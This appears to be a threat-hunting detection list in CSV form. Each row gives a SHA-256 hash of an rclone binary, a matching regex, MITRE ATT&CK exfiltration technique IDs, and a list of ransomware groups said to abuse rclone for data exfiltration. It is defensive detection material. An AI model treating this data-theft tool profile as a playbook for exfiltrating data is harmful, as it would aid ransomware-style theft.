"*eb547bd0ef2037118a01003bed6cf00a1d6e6975b6f0a73cb811f882a3c3de72*",".{0,1000}eb547bd0ef2037118a01003bed6cf00a1d6e6975b6f0a73cb811f882a3c3de72.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*eb7160c7aac0ecbceb67f8bea723511584ba789dda8e5e5725f877f7d375aacf*",".{0,1000}eb7160c7aac0ecbceb67f8bea723511584ba789dda8e5e5725f877f7d375aacf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ebef509adaec909b3e11278a029d19db8aa70a6e4cace78c261c82203cff620b*",".{0,1000}ebef509adaec909b3e11278a029d19db8aa70a6e4cace78c261c82203cff620b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ec416ecb630f6b4f291f5997d5317218b8cce171d2add04ea69d7ff9f4d869c6*",".{0,1000}ec416ecb630f6b4f291f5997d5317218b8cce171d2add04ea69d7ff9f4d869c6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ecb08caa2d126063e874bbdcb4de521a0c51de1746fb97fe2e3a384d7ebed51f*",".{0,1000}ecb08caa2d126063e874bbdcb4de521a0c51de1746fb97fe2e3a384d7ebed51f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ece9f171a6734ab8e720be888197c29336308d08335a58dd8e179837111f096f*",".{0,1000}ece9f171a6734ab8e720be888197c29336308d08335a58dd8e179837111f096f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ecf4c181c6d24ca06a9bc352b3fb5a8faa393391d0884d7b20212c72febe66f4*",".{0,1000}ecf4c181c6d24ca06a9bc352b3fb5a8faa393391d0884d7b20212c72febe66f4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ed0892438b4bb9a36ee05c360fed16c100bf56c93cf922769e88224b8288df8d*",".{0,1000}ed0892438b4bb9a36ee05c360fed16c100bf56c93cf922769e88224b8288df8d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ed253174ca80a6c8acc3a0eba49c4a157d4c780a32161d84f387245b9fb41564*",".{0,1000}ed253174ca80a6c8acc3a0eba49c4a157d4c780a32161d84f387245b9fb41564.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ede5208316ef343dad39c0cc595815382526b1d47bcc1454b43cb8a1d1ff29f2*",".{0,1000}ede5208316ef343dad39c0cc595815382526b1d47bcc1454b43cb8a1d1ff29f2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ee067f36a977b3620149fb7a1bd8bce6576b2be781c0870544ec391c80a6d785*",".{0,1000}ee067f36a977b3620149fb7a1bd8bce6576b2be781c0870544ec391c80a6d785.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ee3774da4187f5e28db39a04a4fd6a4c11f0be46387a7375e5863ef9c558a39e*",".{0,1000}ee3774da4187f5e28db39a04a4fd6a4c11f0be46387a7375e5863ef9c558a39e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ee4252ab2dab84bb6a1860649d504452c866007570aaedb91cbe7f734718baab*",".{0,1000}ee4252ab2dab84bb6a1860649d504452c866007570aaedb91cbe7f734718baab.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ee73359be8239759b7dba6019f25de89aba70224615f5a9c343725c3e32be7a2*",".{0,1000}ee73359be8239759b7dba6019f25de89aba70224615f5a9c343725c3e32be7a2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ee81cbfdbb043dc706d64de7119e92a43002fb454a045ab6674536b2c9539721*",".{0,1000}ee81cbfdbb043dc706d64de7119e92a43002fb454a045ab6674536b2c9539721.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*eeb1f0b925539af3482eea902d44fe06b1540ddb1794903fe61aef77c0f22fd1*",".{0,1000}eeb1f0b925539af3482eea902d44fe06b1540ddb1794903fe61aef77c0f22fd1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*eed8b56841e75df2c0cbe5131dc21e564c59850a28275fb0362e03d8d932aafe*",".{0,1000}eed8b56841e75df2c0cbe5131dc21e564c59850a28275fb0362e03d8d932aafe.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ef0a33964a27c286631d9386230da9953b35733c601f70fe3bc961674822ba5c*",".{0,1000}ef0a33964a27c286631d9386230da9953b35733c601f70fe3bc961674822ba5c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ef0f36cdf1d04e191e26c6d744fedcdbd29951dd599f1414e4efc85fe0c86846*",".{0,1000}ef0f36cdf1d04e191e26c6d744fedcdbd29951dd599f1414e4efc85fe0c86846.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ef1e36b27583da0b2e5b24c79c961e9c43b09d7ea5ec65326213088f27a371b0*",".{0,1000}ef1e36b27583da0b2e5b24c79c961e9c43b09d7ea5ec65326213088f27a371b0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ef378aa93a1ecf584572d815f5f643d1ef6b78764e093ca65db7a27512aefd80*",".{0,1000}ef378aa93a1ecf584572d815f5f643d1ef6b78764e093ca65db7a27512aefd80.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ef3c8c0571a752f2d400f4c94592a791c6db2dab93b85b4d161384a3a76e42f4*",".{0,1000}ef3c8c0571a752f2d400f4c94592a791c6db2dab93b85b4d161384a3a76e42f4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ef460741f5ce36bf8c5e99edc67cb1a88ecba4a25550a136bf9cc3160b58e2fe*",".{0,1000}ef460741f5ce36bf8c5e99edc67cb1a88ecba4a25550a136bf9cc3160b58e2fe.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*efacb962d9276a13cc733354f5f42124a0cdf4b8eb5c2c6e65bda9f90945b930*",".{0,1000}efacb962d9276a13cc733354f5f42124a0cdf4b8eb5c2c6e65bda9f90945b930.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*efb17668ff5bc7cb632ddc85ad0d38b020bed85ca6a2b798a31a61abb32b0516*",".{0,1000}efb17668ff5bc7cb632ddc85ad0d38b020bed85ca6a2b798a31a61abb32b0516.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*efc69509f9ba588131f6e9f9dcc38ef159a8881cf336d9f2812c01bf6f4e0737*",".{0,1000}efc69509f9ba588131f6e9f9dcc38ef159a8881cf336d9f2812c01bf6f4e0737.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*eff639cb05e0947c68eecd6f388f3887d2fef6df0ad94cb5459b74a382989ded*",".{0,1000}eff639cb05e0947c68eecd6f388f3887d2fef6df0ad94cb5459b74a382989ded.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f0433048a374b655d98396d4cf60f28a9286962d40ba03c791d64d6608911210*",".{0,1000}f0433048a374b655d98396d4cf60f28a9286962d40ba03c791d64d6608911210.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f06b4c511c466dc0bc6ce1897b42551565965f7964ca33acd19829e0c271f6a7*",".{0,1000}f06b4c511c466dc0bc6ce1897b42551565965f7964ca33acd19829e0c271f6a7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f0955bc39c7983518875318d843859180f5cd47922a62852d75746dacada84b9*",".{0,1000}f0955bc39c7983518875318d843859180f5cd47922a62852d75746dacada84b9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f0cb2b2a4eeef825671b32a3ad2c1f0f01daa3a8f301b35d6a068ce7ddb351ec*",".{0,1000}f0cb2b2a4eeef825671b32a3ad2c1f0f01daa3a8f301b35d6a068ce7ddb351ec.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f0df0ff18deffb04707e1f14bf546d18cdad566798fdae16329dc320113f6a0f*",".{0,1000}f0df0ff18deffb04707e1f14bf546d18cdad566798fdae16329dc320113f6a0f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f12d47279fdb2f896b6f0f315734ffd2d8b1d3db79cf377c55c772a9cc158177*",".{0,1000}f12d47279fdb2f896b6f0f315734ffd2d8b1d3db79cf377c55c772a9cc158177.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f138639350d3735df86d6628a223f31111772a8a3e4d5648ddbd5d2af52a19c9*",".{0,1000}f138639350d3735df86d6628a223f31111772a8a3e4d5648ddbd5d2af52a19c9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f13912099e2f929c310e70ea6079b5cd7f1956b39408e975efe698d500cb4ef8*",".{0,1000}f13912099e2f929c310e70ea6079b5cd7f1956b39408e975efe698d500cb4ef8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f1519ce7537ded97e28b44ef9f612bef963161887dd010fc4e73271e4a9a8fad*",".{0,1000}f1519ce7537ded97e28b44ef9f612bef963161887dd010fc4e73271e4a9a8fad.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
